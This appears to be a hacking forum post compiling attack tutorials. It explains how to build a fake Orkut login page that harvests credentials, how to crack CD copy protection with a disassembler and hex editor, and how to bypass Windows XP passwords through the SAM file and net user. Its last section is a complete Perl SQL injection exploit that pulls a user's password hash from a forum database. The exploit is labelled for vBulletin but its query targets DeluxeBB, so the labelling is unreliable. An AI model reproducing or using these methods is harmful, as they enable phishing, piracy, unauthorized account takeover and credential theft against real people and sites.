Creating Orkut's Fake Login Page!
* Open your Internet explorer or Mozilla Firefox!* Open but don't Sign in there.* Open the Page Source of it from the View menu and copy the whole code and save it as Orkut Page Source in your Notepad.* Open Orkut Page Source in Notepad and press ctrl+f and type * It will search for it.* Erase that whole line and the next line.* Now, copy and paste the following code there.* Also change rename your e-mail ID in the above code and rename that hxxp as http.* Now, press ctrl+f again and type there so u have to change it as * Save it as orkut.html* Now, go to or and make an account there.* Login there and open File Manager and upload that orkut.html.* Check the URL there and now the site is all yours.Check my Fake Page!
Cracking Software Protection!
Softwares you need : - W32Dasm and HIEWIdentifying the protection : ====>>>>Run the program, game, etc., (SoftwareX) that you want to crack without the CD in the CD reader. SoftwareX will not run of course, however, when the error window pops up it will give you all of the vital information that you need to crack the program, so be sure towrite down what it says.Cracking the Protection : ====>>>>Now, run Win32Dasm. On the file menu open DISASSEMBLER > OPEN FILE TO DISASSEMBLE. Select SoftwareX’s executable file in the popup window that will appear (e.g. SoftwareX.exe). W32Dasm may take several minutes to disassemble the file.When W32Dasm finishes disassembling the file it will display unrecognizable text; this is what we want. Click on the String Data References button. Scroll through the String Data Items until you find SoftwareX’s error message. When you locate it, double click theerror message and then close the window to return to the Win32Dasm text. You will notice that you have been moved somewhere within the SoftwareX’s check routine; this is where the error message in generated.Now comes the difficult part, so be careful. To crack SoftwareX’s protection you must know the @offset of every call and jump command. Write down every call and jump @offset number that you see (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the “h.”Now open HIEW, locate SoftwareX’s executable, and press the F4 key. At this point a popup window will appear with 3 options: Text, Hex, and Decode. Click on “Decode” to see a list of numbers. Now press the F5 key and enter the number that was extracted using Win32Dasm. After you have entered the number you will be taken to SoftwareX’s check routine within HIEW.To continue you must understand this paragraph. If the command that you are taken to is E92BF9BF74, for example, it means that the command equals 5 bytes. Every 2 digits equal one byte: E9-2B-F9-BF-74 => 10 digits => 5 bytes.
Hacking Windows XP!
In case of a User's Password loss.* Boot the PC in Safemode by pressing the F8 key when starting your computer.* Select the Safe Mode option. You can now logon as an administrator and XP won't prompt for the Password.* Try rebooting the PC in DOS.* Now, Access C:\Windows\system32\config\SAM.* Rename SAM as SAM.mj.* Now XP won't ask for Password next time you Login.* Now, again go to Start menu --> Run.* Type there cmd prompt.* Type net user *. It will list all the users.* Again type net user "administrator" or the name of the administrator "name" *.* It will ask for the password. Type the password and there you are done.* Hold the Ctrl-Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator. To unhide the Administrator account so it does show up.* Again go to Start --> Run --> regedit.* Go to HKEY_LOCAL_MACHINE --> SOFTWARE --> Microsoft --> Windows NT --> CurrentVersion --> Winlogon --> SpecialAccounts --> UserList.* Unhide the Administrator key by giving it a value of 1.
Hacking Vbulletin forum 3.6.1!
* First download Active perl 5.8.8.* Create a Notepad file.* Then Copy & Paste this script in Notepad file.* Click on Save as and rename it as and Save it in bin folder of perl.* Go to Start menu --> Run.* Type there cmd and write this. C:\Perl\bin* Now type perl hostname /directory /userid* It will extract you the Password Hash of the User ID you provide.* Basically, User ID of Administrator is 1.CODE:#!/usr/bin/perluse IO::Socket;print q{################################################## ##### DeluxeBB Remote SQL Injection Exploit ## vbulletin Remote SQL Injection Exploit ## // SekoMirza // Turkish Hackerz ################################################### ####};if (!$ARGV[2]) {print q{Usage: perl host /directory/ victim_useridperl [Only Registered Users Can See Links] /forum/ 1};}$server = $ARGV[0];$dir = $ARGV[1];$user = $ARGV[2];$myuser = $ARGV[3];$mypass = $ARGV[4];$myid = $ARGV[5];print "------------------------------------------------------------------------------------------------\r\n";print "[>] SERVER: $server\r\n";print "[>] DIR: $dir\r\n";print "[>] USERID: $user\r\n";print "------------------------------------------------------------------------------------------------\r\n\r\n";$server =~ s/([Only Registered Users Can See Links])//eg;$path = $dir;$path .="misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%20WHERE%20(uid='".$user ;print "[~] PREPARE TO CONNECT...\r\n";$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") die "[-] CONNECTION FAILED";print "[+] CONNECTED\r\n";print "[~] SENDING QUERY...\r\n";print $socket "GET $path [Only Registered Users Can See Links]";print $socket "Host: $server\r\n";print $socket "Accept: */*\r\n";print $socket "Connection: close\r\n\r\n";print "[+] DONE!\r\n\r\n";print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";while ($answer = <$socket>){if ($answer =~/(\w{32})/){if ($1 ne 0) {print "Password Hash is: ".$1."\r\n";print "--------------------------------------------------------------------------------------\r\n";}exit();} }print "------------------------------------------------------------------------------------------------\r\n";################################################## ########Shoutz: ## ## My Sweet -> Caramel ## For Mp3s -> Hypn0sis ## For Support -> [[Only Registered Users Can See Links]] ## My Bro -> PhantomOrchid ## My Preceptor -> Earnk Kazno ################################################### #######
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